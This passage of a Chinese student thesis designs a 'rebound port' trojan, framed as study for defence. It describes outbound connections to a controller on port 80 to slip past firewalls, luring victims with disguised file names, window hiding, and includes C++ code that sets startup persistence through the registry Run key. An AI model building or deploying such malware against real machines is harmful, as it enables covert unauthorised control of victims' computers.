反彈端口木馬的設(shè)計(jì)與實(shí)現(xiàn)論文

PAGE第1頁(yè)共18頁(yè)反彈端口木馬的設(shè)計(jì)與實(shí)現(xiàn)論文作者姓名：申請(qǐng)學(xué)位專業(yè)：申請(qǐng)學(xué)位類別：論文提交日期：PAGE第1頁(yè)共18頁(yè)反彈端口木馬的設(shè)計(jì)與實(shí)現(xiàn)摘要木馬是用于遠(yuǎn)程控制的黑客工具，被黑客用來(lái)遠(yuǎn)程操作他人計(jì)算機(jī)、監(jiān)視別人和盜竊別人帳號(hào)、密碼和數(shù)據(jù)等，以達(dá)到破壞他人計(jì)算機(jī)、偷竊別人隱私和得到經(jīng)濟(jì)利益的目的。作為網(wǎng)絡(luò)安全管理人員，認(rèn)真地研究木馬攻擊技術(shù)，理清木馬攻擊手段與過(guò)程，提早思考應(yīng)對(duì)策略是防御木馬攻擊的有效途徑。因此，在木馬已對(duì)網(wǎng)絡(luò)與信息安全構(gòu)成極大危險(xiǎn)的時(shí)代研究木馬技術(shù)、編寫木馬程序，對(duì)于防護(hù)網(wǎng)絡(luò)安全、促進(jìn)電子商務(wù)的發(fā)展具有重要的現(xiàn)實(shí)意義。文中在深入研究國(guó)內(nèi)外木馬技術(shù)與發(fā)展方向的基礎(chǔ)上，介紹了木馬的發(fā)展與現(xiàn)狀以及木馬組成與特性；對(duì)反彈端口木馬的連接方法進(jìn)行了具體詳盡的分析。充分利用傳統(tǒng)防火墻疏于對(duì)向外連接的過(guò)濾這一特點(diǎn)，使用VisualC++6.0進(jìn)行Socket網(wǎng)絡(luò)編程開(kāi)發(fā)而成。實(shí)現(xiàn)了木馬繞過(guò)防火墻建立連接；實(shí)現(xiàn)木馬的隱藏、自動(dòng)運(yùn)行等基本特性，讓服務(wù)端光驅(qū)彈出、機(jī)箱播放音樂(lè)等功能。文中細(xì)致地描繪了木馬的功能執(zhí)行過(guò)程。最后提供了全面的測(cè)試結(jié)果。關(guān)鍵詞：木馬；反彈端口；服務(wù)端；客戶端；套接字DesignandImplementationofReboundPortsTrojanhorseAbstractTheTrojanhorseisakindofhacker’stoolwhichisusedforremotecontrolandoperatingothers’computers,monitoringandstealingothers’accountnumbers,passwordsanddataandsoon,inordertodestroyothers’computersorgettheirprivacyandeconomicinterests.AstheInternetsecuritymanager,weshouldpayattentiontopreventingtheTrojanhorsewhenwedetectanddeletetheTrojanhorse.WemuststudythetechnologyoftheTrojanhorseattack,clearthemeansandprocessoftheTrojanhorsetofindanefficientpathtopreventtheTrojanhorseattackaheadoftime.SoatthetimethattheTrojanhorseisdangeroustothenetworkandsecurityofinformation,weshouldstudythetechnologyoftheTrojanhorseandcodetheTrojanhorseprograms,whichissignificanttoprotecttheInternetsecurityandpromotethedevelopmentofthee-business.ThethesisiswritenonthebasesofdeeplystudyingtheTrojanhorsetechniqueanddevelopmentorientationathomeandoverseas,then,introducesthedevelopmentandcurrentsituationofTrojanhorseanditscomponentaswellascharacteristics.ThisthesisanalyzesthemethodofhowtoconnectwithReboundPortsTrojanhorseindetail.MakingfulluseofwhichthefirewallneglecttofiltertheReboundPortsTrojanhorse,itisdevelopedbyVisualC++6.0.Thedesignhasrealizedthefunctionwhichtheservicecouldconnecttheclientactively,alsoimplementedthebasiccharacteristicsofconcealment,automaticrunning,reboundingtheCD-ROMofservices,chassisplayingmusicandsoon.AtlastthepaperdescribestheprogressofexecutingTrojanhorseandaffordsall-aroundtestresult.Keywords:Trojanhorse;Reboundport;serviceport;clientport;socket目錄論文總頁(yè)數(shù)：19頁(yè)1 引言 11.1 課題背景 11.2 國(guó)內(nèi)外研究現(xiàn)狀 11.3 課題研究的意義 21.4 課題的研究方法 22 相關(guān)理論基礎(chǔ) 22.1 木馬概述 22.1.1木馬的組成 32.1.2木馬的特征 32.1.3反彈端口木馬介紹 42.2 C/S模式 42.3 套接字（Socket） 52.4 VisualC++6.0 53 需求分析 53.1 系統(tǒng)規(guī)格說(shuō)明 53.1.1木馬的概貌 53.1.2功能要求 63.1.3性能要求 63.1.4運(yùn)行要求 63.2 數(shù)據(jù)要求 63.3 用戶系統(tǒng)描述 74 木馬的設(shè)計(jì)與實(shí)現(xiàn) 74.1 木馬結(jié)構(gòu)設(shè)計(jì) 74.1.1木馬的主體設(shè)計(jì) 84.1.2木馬的自動(dòng)啟動(dòng)實(shí)現(xiàn) 84.1.3木馬的窗口隱藏實(shí)現(xiàn) 94.2 木馬連接過(guò)程 94.2.1連接過(guò)程理論研究 94.2.2木馬連接過(guò)程實(shí)現(xiàn) 114.3 木馬的遠(yuǎn)程控制功能設(shè)計(jì) 134.3.1 木馬的功能實(shí)現(xiàn) 134.3.2 木馬的功能執(zhí)行過(guò)程 145 測(cè)試 155.1 測(cè)試環(huán)境 155.2 測(cè)試過(guò)程與結(jié)果 15結(jié)論 17參考文獻(xiàn) 17致謝 18聲明 19第19頁(yè)共19頁(yè)引言課題背景隨著計(jì)算機(jī)及網(wǎng)絡(luò)技術(shù)的飛速發(fā)展，Internet/Intranet應(yīng)用在全球范圍內(nèi)日益普及，它們帶來(lái)世界范圍內(nèi)的信息共享，它采用的TCP/IP協(xié)議，提供的電子郵件、遠(yuǎn)程登錄、文件傳輸、WWW服務(wù)，極大的方便了人們的信息交換和信息共享，隨著Internet逐漸滲透到生產(chǎn)和生活中的各個(gè)領(lǐng)域，網(wǎng)絡(luò)在快捷、方便地帶來(lái)大量信息的同時(shí)，也帶來(lái)諸多安全問(wèn)題。當(dāng)今社會(huì)在快速向信息化社會(huì)前進(jìn)時(shí)，信息的安全也顯得越來(lái)越重要。日前，我國(guó)網(wǎng)絡(luò)安全面臨嚴(yán)峻的形勢(shì)。因特網(wǎng)上頻繁發(fā)生大規(guī)模的黑客入侵與計(jì)算機(jī)病毒泛濫事件使我國(guó)很多政府部門、教育和商業(yè)機(jī)構(gòu)都受到不同程度的侵害，甚至造成極壞的社會(huì)影響和經(jīng)濟(jì)損失。而木馬是黑客入侵的重要工具，木馬技術(shù)也在不斷更新，它們通過(guò)占用系統(tǒng)資源、破壞系統(tǒng)文件、竊取帳號(hào)和密碼、盜取機(jī)密文件等，給個(gè)人或單位帶來(lái)不可彌補(bǔ)的災(zāi)難和巨大的經(jīng)濟(jì)損失，因此有效地防范病毒感染和木馬程序,降低災(zāi)難的可能性迫在眉睫。國(guó)內(nèi)外研究現(xiàn)狀木馬從誕生到現(xiàn)在已經(jīng)經(jīng)歷了五代的發(fā)展了。第一代木馬（偽裝型病毒），通過(guò)偽裝成一個(gè)合法性程序誘騙用戶上當(dāng)，這是最為原始的木馬，還只具有破壞性；第二代木馬（AIDS型木馬），利用現(xiàn)實(shí)生活中的郵件進(jìn)行散播，第二代木馬已具備了傳播特征，冰河可以說(shuō)為是國(guó)內(nèi)木馬的典型代表之一；第三代木馬（網(wǎng)絡(luò)傳播性木馬），添加了“后門”功能，添加了擊鍵記錄等功能，這一代的木馬都基于網(wǎng)絡(luò)的客戶端/服務(wù)器應(yīng)用程序。具有搜集信息、執(zhí)行系統(tǒng)命令、重新設(shè)置機(jī)器、重新定向等功能，出現(xiàn)了ICMP等類型的木馬，利用畸形報(bào)文傳遞數(shù)據(jù)，增加了查殺的難度；第四代木馬在進(jìn)程隱藏方面，做了大的改動(dòng)，采用了內(nèi)核插入式的嵌入方式，利用遠(yuǎn)程插入線程技術(shù)，嵌入DLL線程，或者掛接PSAPI,實(shí)現(xiàn)木馬程序的隱藏，甚至在WindowsNT/2000下，都達(dá)到了良好的隱藏效果；第五代木馬可以說(shuō)是病毒性木馬，實(shí)現(xiàn)像病毒那樣直接感染。當(dāng)前的木馬已經(jīng)進(jìn)入了新的發(fā)展階段，除繼承了前三代木馬的特性外，又形成了其新的特性，首先，其功能更加強(qiáng)大，已經(jīng)由單一功能發(fā)展到綜合性木馬，向遠(yuǎn)程控制發(fā)展，像Netspy（網(wǎng)絡(luò)精靈）這樣的木馬，除了能在服務(wù)端執(zhí)行指定程序、關(guān)機(jī)操作、發(fā)送信息、顯示屏幕還能對(duì)服務(wù)端的進(jìn)程進(jìn)行操作，以及能像操作本機(jī)文件一樣操作服務(wù)端文件。其次，為了逃過(guò)殺毒軟件的檢測(cè)，躲過(guò)用戶的發(fā)現(xiàn)，其隱藏和自啟動(dòng)有了長(zhǎng)足的發(fā)展，通過(guò)隱藏窗口、共用端口，利用把木馬程序?qū)懗蒬ll動(dòng)態(tài)鏈接庫(kù)隱藏進(jìn)程，加強(qiáng)了木馬的隱蔽性，加大了用戶發(fā)現(xiàn)和找出木馬程序的難度；通過(guò)修改文件名或圖標(biāo)、關(guān)聯(lián)文件、寫注冊(cè)表、修改啟動(dòng)文件（win.ini、System.ini）等手段實(shí)現(xiàn)開(kāi)機(jī)自動(dòng)運(yùn)行；為繞過(guò)防火墻的檢查，也出現(xiàn)了反彈端口的木馬，如網(wǎng)絡(luò)神偷。課題研究的意義木馬程序使得遠(yuǎn)端的黑客能夠享有系統(tǒng)的控制權(quán)，對(duì)網(wǎng)絡(luò)和計(jì)算機(jī)系統(tǒng)的安全構(gòu)成了極大的威脅。“知己知彼，百戰(zhàn)不殆”，作為專業(yè)的網(wǎng)絡(luò)安全工作者，如果想有效地降低木馬程序帶來(lái)災(zāi)難的可能性，找出防御木馬攻擊的有效途徑，就必須認(rèn)真地研究木馬攻擊的技術(shù)。在研究木馬攻防的過(guò)程中，如果能夠理清木馬攻擊手段的發(fā)展脈絡(luò)，就有可能進(jìn)一步找出木馬發(fā)展的趨勢(shì)，并提早思考應(yīng)對(duì)策略。如傳統(tǒng)的木馬一般直接利用TCP/IP協(xié)議進(jìn)行控制端和被控制端通信，這種通信可以使用snifer工具監(jiān)聽(tīng)。分析該通信的特征就可以從中尋找木馬的蛛絲馬跡?；诰W(wǎng)絡(luò)的木馬入侵探測(cè)系統(tǒng)的工作原理正是通過(guò)對(duì)網(wǎng)絡(luò)上傳輸?shù)膶?shí)際分組的內(nèi)容進(jìn)行測(cè)試、對(duì)分組結(jié)構(gòu)進(jìn)行識(shí)別來(lái)分析網(wǎng)絡(luò)中使用的協(xié)議并從其中抽取木馬相關(guān)信息。一旦木馬開(kāi)發(fā)者利用諸如隱蔽信道之類的技術(shù)使得信道不再具有明顯的特征，對(duì)此類檢測(cè)手段將產(chǎn)生致命性的打擊。網(wǎng)絡(luò)安全工作者必須未雨綢繆，對(duì)此先行研究以及早提出應(yīng)對(duì)方案。木馬攻擊與防范是矛盾的兩個(gè)方面，攻擊和防范技術(shù)在不斷地相互較量中也不斷地相互促進(jìn)，這個(gè)過(guò)程還將依然持續(xù)下去。課題的研究方法先從網(wǎng)上查閱木馬相關(guān)資料，了解木馬的發(fā)展以及當(dāng)前木馬技術(shù)水平，深刻領(lǐng)會(huì)木馬攻擊以及木馬程序的工作原理，加強(qiáng)程序編碼的學(xué)習(xí)，學(xué)會(huì)Windows網(wǎng)絡(luò)編程，之后進(jìn)行各部分的程序設(shè)計(jì)，然后進(jìn)行代碼調(diào)試，邏輯功能調(diào)試以及木馬種植和木馬攻擊的測(cè)試。在設(shè)計(jì)中以需求分析為基礎(chǔ)，寫出實(shí)現(xiàn)流程及相關(guān)問(wèn)題的實(shí)現(xiàn)方法相關(guān)理論基礎(chǔ)本木馬采用C/S工作模式，由客戶端和服務(wù)端兩部分組成，服務(wù)端作為被控端運(yùn)行在目標(biāo)計(jì)算機(jī)上，接收指令，根據(jù)指令執(zhí)行相應(yīng)的操作；客戶端作為主控端運(yùn)行在用戶計(jì)算機(jī)向服務(wù)端發(fā)送指令。編碼上是利用VC++進(jìn)行Socket網(wǎng)絡(luò)編程，使用VisualC++6.0進(jìn)行編譯。木馬概述特洛伊木馬，簡(jiǎn)稱木馬，英文叫做“Trojanhorse”，其名稱取自希臘神話的特洛伊木馬記。木馬是一種基于遠(yuǎn)程控制的黑客工具。它通過(guò)在你的電腦系統(tǒng)隱藏一個(gè)會(huì)在Windows啟動(dòng)時(shí)悄悄運(yùn)行的程序，采用服務(wù)器/客戶機(jī)的運(yùn)行方式，從而達(dá)到在你上網(wǎng)時(shí)控制你的電腦的目的。黑客可以利用它竊取你的口令、瀏覽你的驅(qū)動(dòng)器、修改你的文件、登錄注冊(cè)表等等。2.1.1木馬的組成一個(gè)完整的木馬系統(tǒng)由硬件部分，軟件部分和具體連接部分組成。(1)硬件部分：建立木馬連接所必須的硬件實(shí)體?？刂贫耍簩?duì)服務(wù)端進(jìn)行遠(yuǎn)程控制的一方。服務(wù)端：被控制的一方。INTERNET：控制端對(duì)服務(wù)端進(jìn)行遠(yuǎn)程控制，數(shù)據(jù)傳輸?shù)木W(wǎng)絡(luò)載體。(2)軟件部分：實(shí)現(xiàn)遠(yuǎn)程控制所必須的軟件程序?？刂贫顺绦颍嚎刂贫擞靡赃h(yuǎn)程控制服務(wù)端的程序。木馬程序：潛入服務(wù)端內(nèi)部，獲取其操作權(quán)限的程序。(3)具體連接部分：通過(guò)INTERNET在服務(wù)端和控制端之間建立一條木馬通道所必須的元素?？刂贫薎P，服務(wù)端IP：即控制端，服務(wù)端的網(wǎng)絡(luò)地址，也是木馬進(jìn)行數(shù)據(jù)傳輸?shù)哪康牡??？刂贫硕丝?，木馬端口：即控制端，服務(wù)端的數(shù)據(jù)入口，通過(guò)這個(gè)入口，數(shù)據(jù)可直達(dá)控制端程序或木馬程序。2.1.2木馬的特征木馬程序有許多種不同的種類，那是受不同的人、不同時(shí)期開(kāi)發(fā)來(lái)區(qū)別的，如BackOrifice(BO)、BackOrifice2000、Netspy、Picture、Netbus、Asylum、冰河等等這些都屬于木馬病毒種類。綜合現(xiàn)在流行的木馬程序，它們都有以下基本特征：隱蔽性木馬必需隱藏在被攻擊計(jì)算機(jī)的系統(tǒng)之中，它會(huì)想盡一切辦法不讓被攻擊者發(fā)現(xiàn)它。其隱蔽性主要體現(xiàn)在以下兩個(gè)方面:a、不產(chǎn)生圖標(biāo),它雖然在你系統(tǒng)啟動(dòng)時(shí)會(huì)自動(dòng)運(yùn)行，但它不會(huì)在“任務(wù)欄”中產(chǎn)生一個(gè)圖標(biāo)；b、木馬程序自動(dòng)在任務(wù)管理器中隱藏，并以“系統(tǒng)服務(wù)”的方式欺騙操作系統(tǒng)。自動(dòng)運(yùn)行性木馬必須在系統(tǒng)啟動(dòng)時(shí)能自動(dòng)運(yùn)行，所以它必需潛入在你的啟動(dòng)配置文件中，如win.ini、system.ini、winstart.bat以及啟動(dòng)組等文件之中或者注冊(cè)表的啟動(dòng)項(xiàng)中。木馬程序具有欺騙性木馬程序要達(dá)到其長(zhǎng)期隱蔽的目的，就必需借助系統(tǒng)中已有的文件，以防被你發(fā)現(xiàn)，它經(jīng)常使用的是常見(jiàn)的文件名或擴(kuò)展名，如“dll\win\sys\explorer等字樣，或者仿制一些不易被人區(qū)別的文件名，如字母“l(fā)”與數(shù)字“1”、字母“o”與數(shù)字“0”，常修改基本個(gè)文件中的這些難以分辨的字符，更有甚者干脆就借用系統(tǒng)文件中已有的文件名，只不過(guò)它保存在不同路徑之中。還有的木馬程序?yàn)榱穗[藏自己，也常把自己設(shè)置成一個(gè)ZIP文件式圖標(biāo)，當(dāng)你一不小心打開(kāi)它時(shí)，它就馬上運(yùn)行。等等這些手段那些編制木馬程序的人還在不斷地研究、發(fā)掘，總之是越來(lái)越隱蔽，越來(lái)越專業(yè)，所以有人稱木馬程序?yàn)椤膀_子程序”。自動(dòng)恢復(fù)功能現(xiàn)在很多的木馬程序中的功能模塊已不再是由單一的文件組成，而是具有多重備份，可以相互恢復(fù)。自動(dòng)打開(kāi)特別的端口木馬程序潛入個(gè)人的電腦之中的目的不主要為了破壞被攻擊計(jì)算機(jī)的系統(tǒng)，更是為了獲取其系統(tǒng)中有用的信息，這樣就必需當(dāng)被攻擊計(jì)算機(jī)上網(wǎng)時(shí)能與遠(yuǎn)端客戶進(jìn)行通訊，這樣木馬程序就會(huì)用服務(wù)器/客戶端的通訊手段把信息告訴黑客們，以便黑客們控制目標(biāo)機(jī)器，或?qū)嵤└舆M(jìn)一步入侵企圖。功能的特殊性通常的木馬的功能都是十分特殊的，除了普通的文件操作以外，還有些木馬具有搜索cache中的口令、設(shè)置口令、掃描目標(biāo)機(jī)器人的IP地址、進(jìn)行鍵盤記錄、遠(yuǎn)程注冊(cè)表的操作、以及鎖定鼠標(biāo)等功能。2.1.3反彈端口木馬介紹反彈端口木馬是木馬開(kāi)發(fā)者在分析了防火墻的特性后發(fā)現(xiàn)：防火墻對(duì)于連入的鏈接往往會(huì)進(jìn)行非常嚴(yán)格的過(guò)濾，但是對(duì)于連出的鏈接卻疏于防范。于是，與一般的木馬相反，反彈端口型木馬的服務(wù)端(被控制端)使用主動(dòng)端口，客戶端(控制端)使用被動(dòng)端口。木馬定時(shí)監(jiān)測(cè)控制端的存在，發(fā)現(xiàn)控制端上線立即彈出端口主動(dòng)連結(jié)控制端打開(kāi)的主動(dòng)端口；為了隱蔽起見(jiàn)，控制端的被動(dòng)端口一般開(kāi)在80，這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似TCPUserIP:1026ControllerIP:80ESTABLISHED的情況，稍微疏忽一點(diǎn)，被攻擊者就會(huì)以為是自己在瀏覽網(wǎng)頁(yè)。一般防火墻都會(huì)讓用戶向外連接80端口，這樣木馬就繞過(guò)防火墻的過(guò)濾與主控端建立連接,為入侵做好準(zhǔn)備。C/S模式C/S（Client/Server，客戶端/服務(wù)器）模式又稱C/S結(jié)構(gòu)。即大家熟知的客戶機(jī)和服務(wù)器結(jié)構(gòu)。它是軟件系統(tǒng)體系結(jié)構(gòu)，通過(guò)它可以充分利用兩端硬件環(huán)境的優(yōu)勢(shì)，將任務(wù)合理分配到Client端和Server端來(lái)實(shí)現(xiàn)，降低了系統(tǒng)的通訊開(kāi)銷。Client端的任務(wù)是將用戶的要求提交給Server端，再將Server端返回的結(jié)果以特定的形式顯示給用戶；Server端的任務(wù)是接收客戶端提出的服務(wù)請(qǐng)求，進(jìn)行相應(yīng)的處理，再將結(jié)果返回給客戶端。套接字（Socket）套接字（Socket）最初是由加得福尼亞大學(xué)Berkeley分校為Unix操作系統(tǒng)開(kāi)發(fā)的網(wǎng)絡(luò)通信接口。目前已經(jīng)成為最流行的網(wǎng)絡(luò)通信應(yīng)用程序接口之一。應(yīng)用層通過(guò)傳輸層進(jìn)行數(shù)據(jù)通信時(shí)，TCP和UDP會(huì)遇到同時(shí)為多個(gè)應(yīng)用程序進(jìn)程提供并發(fā)服務(wù)的問(wèn)題。多個(gè)TCP連接或多個(gè)應(yīng)用程序進(jìn)程可能需要通過(guò)同一個(gè)TCP協(xié)議端口傳輸數(shù)據(jù)。為了區(qū)別不同的應(yīng)用程序進(jìn)程和連接，許多計(jì)算機(jī)操作系統(tǒng)為應(yīng)用程序與TCP／IP協(xié)議交互提供了稱為套接字(Socket)的接口。區(qū)分不同應(yīng)用程序進(jìn)程間的網(wǎng)絡(luò)通信和連接，主要有3個(gè)參數(shù)：通信的目的IP地址、使用的傳輸層協(xié)議(TCP或UDP)和使用的端口號(hào)。Socket原意是“插座”。通過(guò)將這3個(gè)參數(shù)結(jié)合起來(lái)，與一個(gè)“插座”Socket綁定，應(yīng)用層就可以和傳輸層通過(guò)套接字接口，區(qū)分來(lái)自不同應(yīng)用程序進(jìn)程或網(wǎng)絡(luò)連接的通信，實(shí)現(xiàn)數(shù)據(jù)傳輸?shù)牟l(fā)服務(wù)。Socket實(shí)際上是指一個(gè)通信端點(diǎn)，借助于它，用戶所開(kāi)發(fā)的Socket應(yīng)用程序，可以通過(guò)網(wǎng)絡(luò)與其他Socket應(yīng)用程序進(jìn)行通信。VisualC++6.0VisualC++6.0是微軟公司推出的開(kāi)發(fā)Win32應(yīng)用程序（Windows95/98/2000/XP/NT）的、面向?qū)ο蟮目梢暬晒ぞ?。它的最大?yōu)點(diǎn)就是提供了功能強(qiáng)大的MFC類庫(kù)，MFC是一個(gè)很大的C++類層次結(jié)構(gòu)，其中封裝了大量的類及其函數(shù)，很多Windows程序所共有的標(biāo)準(zhǔn)內(nèi)容可以由MFC的類來(lái)提供，MFC類為這些內(nèi)容提供了用戶接口的標(biāo)準(zhǔn)實(shí)現(xiàn)方法，程序員所要做的就是通過(guò)預(yù)定義的接口把具體應(yīng)用程序特有的東西填入這個(gè)輪廓，這將簡(jiǎn)化編程工作，大大的減少程序員編寫的代碼數(shù)量，使編程工作變得更加輕松容易。需求分析系統(tǒng)規(guī)格說(shuō)明3.1.1木馬的概貌“反彈端口木馬的設(shè)計(jì)與實(shí)現(xiàn)”包含服務(wù)端和客戶端兩部分。服務(wù)端是植入目標(biāo)計(jì)算機(jī)的一個(gè)程序，該程序能夠隱藏窗口，運(yùn)行后不被用戶發(fā)覺(jué),并能在被攻擊計(jì)算機(jī)的系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載,上線時(shí)便向客戶端發(fā)起連接。客戶端為用戶提供控制被攻擊計(jì)算機(jī)的可視化界面，提供各種功能操作按鈕，單擊各按鈕便能在被攻擊計(jì)算機(jī)上進(jìn)行相應(yīng)的操作，方便用戶操作被攻擊計(jì)算機(jī)。3.1.2功能要求實(shí)現(xiàn)給被攻擊計(jì)算機(jī)發(fā)送信息顯示在其桌面上、彈出彈入被攻擊計(jì)算機(jī)的光驅(qū)、關(guān)閉顯示器、移動(dòng)鼠標(biāo)、讓被攻擊計(jì)算機(jī)的機(jī)箱播放指定音樂(lè)、給被攻擊計(jì)算機(jī)的屏幕一個(gè)屏幕布（整個(gè)桌面只顯示一個(gè)顏色）等“破壞性”操作。3.1.3性能要求客戶端界面應(yīng)當(dāng)簡(jiǎn)單、友好、方便使用和操作；木馬的服務(wù)端是用作植入被攻擊計(jì)算機(jī)內(nèi)的可執(zhí)行文件，為了木馬的傳輸和不被發(fā)現(xiàn)，服務(wù)端程序應(yīng)設(shè)計(jì)得精練，占空間小。為提高執(zhí)行速度，從客戶端發(fā)送到服務(wù)端的信息應(yīng)盡量的少。傳統(tǒng)木馬服務(wù)器端都開(kāi)啟一個(gè)端口進(jìn)行監(jiān)聽(tīng)，等待客戶端的連接，但對(duì)安裝有防火墻或通過(guò)代理上網(wǎng)的計(jì)算機(jī)，就無(wú)法建立連接。利用防火墻對(duì)于向內(nèi)的連接往往會(huì)進(jìn)行非常嚴(yán)格的過(guò)濾，對(duì)于向外的連接卻疏于防范這一特點(diǎn)。讓木馬的客戶端開(kāi)啟端口進(jìn)行監(jiān)聽(tīng)，讓服務(wù)端向客戶端發(fā)起連接請(qǐng)求，通過(guò)這一方式建立連接，達(dá)到“反彈”的目的，這樣就能繞過(guò)防火墻攻擊局域網(wǎng)內(nèi)的計(jì)算機(jī)了。3.1.4運(yùn)行要求設(shè)計(jì)出的木馬應(yīng)當(dāng)能在當(dāng)前大量使用的操作系統(tǒng)上都能運(yùn)行，如：Windows2000、WindowsXP、Windows2003；能在較低的硬件配置上運(yùn)行，如128M的內(nèi)存，AMD1800+的處理器。數(shù)據(jù)要求木馬的結(jié)構(gòu)中，客戶端是相當(dāng)于一個(gè)系統(tǒng)的前臺(tái)，為用戶提供了一個(gè)操作界面，而幾乎所有的操作都是在服務(wù)端這個(gè)后臺(tái)處理程序運(yùn)行的，客戶端界面提供的操作可分為連接、動(dòng)作、和信息三個(gè)模塊。連接和信息模塊是在客戶端運(yùn)行的，而動(dòng)作模塊作為木馬的核心，最終是在服務(wù)端運(yùn)行實(shí)現(xiàn)的。木馬的功能結(jié)構(gòu)層次可用圖1來(lái)描述。信息信息清除木馬動(dòng)作屏幕布光驅(qū)彈出播放音樂(lè)光驅(qū)彈入鼠標(biāo)移動(dòng)發(fā)送信息關(guān)閉顯示器關(guān)閉客戶端斷開(kāi)連接連接等待連接圖1功能結(jié)構(gòu)層次圖用戶系統(tǒng)描述攻擊者通過(guò)文件名或文件圖標(biāo)等方式誘騙他人下載并運(yùn)行服務(wù)端，服務(wù)端經(jīng)過(guò)第一次運(yùn)行后就能在系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載了，攻擊者單擊“等待連接”讓客戶端處于監(jiān)聽(tīng)狀態(tài)，與服務(wù)端連接成功后，客戶端會(huì)彈出對(duì)話框顯示與服務(wù)器連接成功的提示，之后，攻擊者可以通過(guò)單擊“動(dòng)作”中的“光驅(qū)彈出”等按鈕對(duì)被攻擊計(jì)算機(jī)進(jìn)行各種操作。每次操作成功后都會(huì)在信息欄中顯示相應(yīng)的提示信息，并能查看到操作的歷史記錄。木馬的設(shè)計(jì)與實(shí)現(xiàn)木馬結(jié)構(gòu)設(shè)計(jì)根據(jù)需求分析本系統(tǒng)分為兩大模塊，即服務(wù)端模塊和客戶端模塊，各模塊下分功能子模塊，詳細(xì)結(jié)構(gòu)可用圖2描述。執(zhí)行服務(wù)端命令動(dòng)作與客戶端連接對(duì)客戶端控制操作與服務(wù)端連接信息傳遞客戶端服務(wù)端木馬執(zhí)行服務(wù)端命令動(dòng)作與客戶端連接對(duì)客戶端控制操作與服務(wù)端連接信息傳遞客戶端服務(wù)端木馬圖2木馬結(jié)構(gòu)圖4.1.1木馬的主體設(shè)計(jì)服務(wù)端運(yùn)行后將自動(dòng)隱藏窗口，就服務(wù)端用戶而言，看不到新窗口彈出，感覺(jué)不到計(jì)算機(jī)做了什么操作，從而隱藏了木馬的服務(wù)端，實(shí)現(xiàn)了木馬的隱蔽?？蛻舳诉\(yùn)行后將彈出如圖3的運(yùn)行界面，攻擊者通過(guò)單擊界面上的按鈕就能很方便的對(duì)被攻擊計(jì)算機(jī)進(jìn)行各種操作。但客戶端運(yùn)行后，應(yīng)先單擊“等待連接”按鈕，創(chuàng)建一個(gè)套接字，等待服務(wù)端的連接。連接成功后將彈出連接成功的對(duì)話框，提示用戶連接已經(jīng)成功，用戶可以對(duì)被攻擊計(jì)算機(jī)進(jìn)行操作了。圖3客戶端運(yùn)行界面4.1.2木馬的自動(dòng)啟動(dòng)實(shí)現(xiàn)木馬的一個(gè)基本特性就是要開(kāi)機(jī)自動(dòng)運(yùn)行，本木馬的自動(dòng)運(yùn)行是通過(guò)寫入注冊(cè)表的啟動(dòng)項(xiàng)，在根鍵HKEY_LOCAL_MACHINE下的Software\\Microsoft\\Windows\\CurrentVersion\\Run中建立名為autorun的子鍵，類型為REG_SZ，數(shù)據(jù)為當(dāng)前運(yùn)行的文件，程序在執(zhí)行這些操作時(shí)首先檢查Run下是否已經(jīng)有該子鍵，若沒(méi)有就創(chuàng)建，有就跳過(guò)此操作。執(zhí)行這些操作的代碼放在CServerView類的Create函數(shù)下，程序初始化時(shí)就能自動(dòng)執(zhí)行。有了這些操作后木馬的服務(wù)端就能在被攻擊計(jì)算機(jī)系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載了。把寫入注冊(cè)表實(shí)現(xiàn)自動(dòng)啟動(dòng)的代碼封裝在函數(shù)write_reg()里，具體實(shí)現(xiàn)代碼詳解如下：intCServerView::write_reg()//函數(shù)名{ //根鍵、子鍵名稱、和到子鍵的句柄 HKEYhRoot=HKEY_LOCAL_MACHINE;char*szSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HKEYhKey; //打開(kāi)指定子鍵 DWORDdwDisposition=REG_OPENED_EXISTING_KEY; //如果存在則不創(chuàng)建 LONGlRet=::RegCreateKeyEx(hRoot,szSubKey,0,NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition); if(lRet!=ERROR_SUCCESS) return-1; //得到當(dāng)前執(zhí)行文件的文件名（包含路徑）charszModule[MAX_PATH];::GetModuleFileName(NULL,szModule,MAX_PATH); //創(chuàng)建一個(gè)新的鍵值，設(shè)置鍵值數(shù)據(jù)為文件名 lRet=::RegSetValueEx(hKey,"autorun",0,REG_SZ,(BYTE*)szModule,strlen(szModule)); ::RegCloseKey(hKey); return1;}4.1.3木馬的窗口隱藏實(shí)現(xiàn)窗口的隱藏是在服務(wù)端程序的server.cpp文件中InitInstance()函數(shù)的函數(shù)體中通過(guò)m_pMainWnd->ShowWindow(SW_HIDE)把窗口顯示的參數(shù)設(shè)為SW_HIDE而實(shí)現(xiàn)。InitInstance()是進(jìn)行程序的初始化，服務(wù)端程序一旦執(zhí)行就首先執(zhí)行該函數(shù)，所以服務(wù)端運(yùn)行時(shí)首先隱藏窗口。木馬連接過(guò)程4.2.1連接過(guò)程理論研究傳統(tǒng)木馬就是一種基于“客戶機(jī)／服務(wù)器”模式的遠(yuǎn)程控制程序，它讓被攻擊的計(jì)算機(jī)運(yùn)行服務(wù)器端的程序，這個(gè)服務(wù)器端的程序會(huì)在被攻擊的計(jì)算機(jī)上打開(kāi)監(jiān)聽(tīng)的端口。這就給黑客入侵用戶計(jì)算機(jī)打開(kāi)了一扇進(jìn)出的門，然后黑客就可以利用木馬的客戶端入侵用戶的計(jì)算機(jī)系統(tǒng)。應(yīng)答數(shù)據(jù)應(yīng)答數(shù)據(jù)請(qǐng)求數(shù)據(jù)建立連接服務(wù)端ConnectSocketRead處理服務(wù)請(qǐng)求WriteClose客戶端AcceptBindSocketListen阻塞，等待連接…WriteReadClose圖4客戶端與服務(wù)端Socket連接過(guò)程常見(jiàn)的普通木馬，是駐留在用戶計(jì)算機(jī)里的一段服務(wù)程序，而攻擊者控制的則是相應(yīng)的客戶端程序。服務(wù)程序通過(guò)特定的端口，打開(kāi)用戶計(jì)算機(jī)的連接資源。一旦攻擊者所掌握的客戶端程序發(fā)出請(qǐng)求，木馬便和他連接起來(lái)，將用戶的信息竊取出去。在這個(gè)過(guò)程中我們發(fā)現(xiàn)此類木馬的最大弱點(diǎn)，在于攻擊者必須和用戶主機(jī)建立連接，木馬才能起作用。隨著防火墻技術(shù)的提高和發(fā)展，基于IP包過(guò)